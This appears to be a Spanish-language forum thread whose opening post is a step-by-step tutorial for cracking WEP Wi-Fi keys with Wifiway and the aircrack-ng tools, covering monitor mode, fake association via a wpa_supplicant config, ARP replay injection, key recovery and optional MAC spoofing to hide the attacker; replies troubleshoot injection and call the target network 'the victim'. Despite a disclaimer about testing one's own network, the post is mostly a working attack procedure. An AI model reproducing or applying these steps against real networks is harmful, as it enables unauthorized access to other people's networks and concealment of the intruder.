Hola, mi primer aporte, espero que les guste
Antes de nada, este manual, lo saque de seguridadwireless.net (creo, ya de tanto leer no estoy seguro) y creo que esta creado por dexterback, yo no voy a hacer copy and paste(explicare todo lo que pueda), lei muxos pero este realmente merece la pena, a mi me funciono.
Yo he usado una tarjeta wifi intel wifi link 5100 AGN. He usado el wifiway 1.0 en live cd. ESTE MANUAL ES PARA COMPROBAR LA SEGURIDAD DE SUS REDES, NO ME HAGO RESPONSABLE DE LO QUE HAGAN. Va dirigido a las contraseñas wep de las redes wifi, yo les aconsejo usar wpa.
Rompiendo contraseñas wep con wifiway 1.0:

1.- Arrancamos wifiway, y usando las herramientas que nos ofrece anotamos el bssid y el ssid ademas de ver el canal en el que se encuentra.

2.- Creamos un archivo con el editor de texto
Código:
network={
ssid="ESSID"
key_mgmt=NONE
bssid=BSSID
wep_key0="232323343478787"
}
Explico esto: las comillas que veis en el código se dejan, ejemplos de ESSID=WLAN_31 BSSID=00:13:2D:3F:46:5S (me los he inventado) y el wep_key0 da igual los numeros, es una clave cualquiera
Y le ponemos el nombre wpa.conf (IMPORTANTE, ACORDAROS DE LA RUTA DONDE LO GUARDAIS)

3.- Abrimos terminal y ponemos:
airmon-ng start wlan0 channel X
la X es el numero del canal, no pongais X, esto sirve para poner la targeta en modo monitor, en el canal que esta la red

4.- Ponemos el codigo:
wpa_supplicant -c/LARUTA/wpa.conf -Dwext -iwlan0
Esto sirve para asociarnos, a veces da un error, paramos con ctrl+c y lo volvemos a poner

5.- Nuevo terminal y ponemos:
airodump-ng -w nuevowifi -c X mon0
Esto es para capturar trafico, yo pongo nuevowifi, vosotros podeis poner otro nombre

6.- Nuevo terminal y ponemos:
aireplay-ng -3 -b (su mac) -h (vuestra mac) mon0
Esto es para inyectar, su mac es = que el BSSID, vuestra mac la podeis ver, en windows escribir "ipconfig /all"

7.-Cuando tengamos bastantes datas, importante datas no mires a los beacons (lo que yo hacia al principio), escribimos:
aircrack-ng -z *.cap
En otro terminal claro esta, si necesita mas datas nos lo dice. Y tendremos la contraseña, a mi me aparecia en hex y en ASCII, si solo os sale en hex podeis vuscar un traductor

OPCIONAL
si quereis ocultar vuestra mac, entre los pasos 1 y 2 realizamos esto:
A.- ifconfig wlan0 down
B.- macchanger -m 00:11:22:33:44:55
C.- ifconfig wlan0 up
Y seguimos con el paso 3


POSIBLE PROBLEMA:
Si teneis un botoncito o una llavecita que se desplaza para aztivar el wifi, muy problablemente no os vaya en wifiway, como me pasaba a mi. Solucion, entre los iconos que aparecen en el escritorio, (ahora no recuerdo mu bien el nombre editare el post), hay uno que nos da la opcion [up] y [down], pulsamos la tecla(o desplazamos la llave) y le damos a ese boton, y se encenderá. Yo lo descubri de chiripa xdxdxd


Espero que os haya gustado, si hay dudas en el post y ya respondere si se la respuesta. Ante cualquier error por favor decirmelo en el post(se aceptan criticas, a ser posible constructivas). Perdon por las posibles faltas de ortografia.

Aaaaaaaaadios.
Sudafrica 2010
################################
################################
################################
################################
Buenas!

Me registré para agradecerte tu aporte en esto de las auditorias.

Tb soy usuario de ese módelo de tarjeta inalámbrica y con el método q' has explicado ha sido el complemento definitivo para concluir con mi auditoría.

Gracias y hasta la próxima.
Hola, selanabar!

He seguido paso a paso tu tutorial, y tengo un problema (espero que sólo uno). Durante el paso 4, tecleo lo siguiente:
wpa_supplicant -c /root/Desktop/wpa.conf -Dwext -iwlan0

...y obtengo lo siguiente:

ioctl[SIOCSIAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl]SIOCGIWSCAN]: Resource temporarily unavailable
Trying to associate with 00:13:f7:94:6c:f0 (SSID='SMC' freq=2437 Mhz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Associated with 00:13:f7:94:6c:f0
CTRL-EVENT-CONNECTED - Connection to 00:13:f7:94:6c:f0 completed (auth) [id=0, str=]


...el caso es que las 2 últimas líneas tienen buena pinta, pero creo que la asociación no se llega a efectuar, porque posteriormente soy incapaz de inyectar paquetes en ese AP. ¿Sabes a qué puede ser debido esto, o acaso este mensaje de error sea normal? ¿acaso en este caso hemos de seleccionar mon0 en lugar de wlan0?

Muchas gracias por anticipado, y un saludo!!!
Hola senlabar te lo muevo no es el sitio...Auditoria Wifi

Salu2
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
reverendo7 escribió:Hola, selanabar!

He seguido paso a paso tu tutorial, y tengo un problema (espero que sólo uno). Durante el paso 4, tecleo lo siguiente:
wpa_supplicant -c /root/Desktop/wpa.conf -Dwext -iwlan0

...y obtengo lo siguiente:

ioctl[SIOCSIAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl]SIOCGIWSCAN]: Resource temporarily unavailable
Trying to associate with 00:13:f7:94:6c:f0 (SSID='SMC' freq=2437 Mhz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Associated with 00:13:f7:94:6c:f0
CTRL-EVENT-CONNECTED - Connection to 00:13:f7:94:6c:f0 completed (auth) [id=0, str=]


...el caso es que las 2 últimas líneas tienen buena pinta, pero creo que la asociación no se llega a efectuar, porque posteriormente soy incapaz de inyectar paquetes en ese AP. ¿Sabes a qué puede ser debido esto, o acaso este mensaje de error sea normal? ¿acaso en este caso hemos de seleccionar mon0 en lugar de wlan0?

Muchas gracias por anticipado, y un saludo!!!

Ese mensaje es correcto, como ves pone connected, a mi tambien me aparece ese mensaje, puede que tu tarjeta no puede inyectar.
Sudafrica 2010
################################
################################
################################
################################
este metodo tambien funciona con la 4965 agn y la 5100 es la nueva version de intel
yo tengo un acer con esta misma tarjeta y inyecta sin problema puedes que estes demaciado lejos del router o que la victima tenga activado un filtrado mac con determinadas mac
Responder

Volver a “Adaptadores Wireless”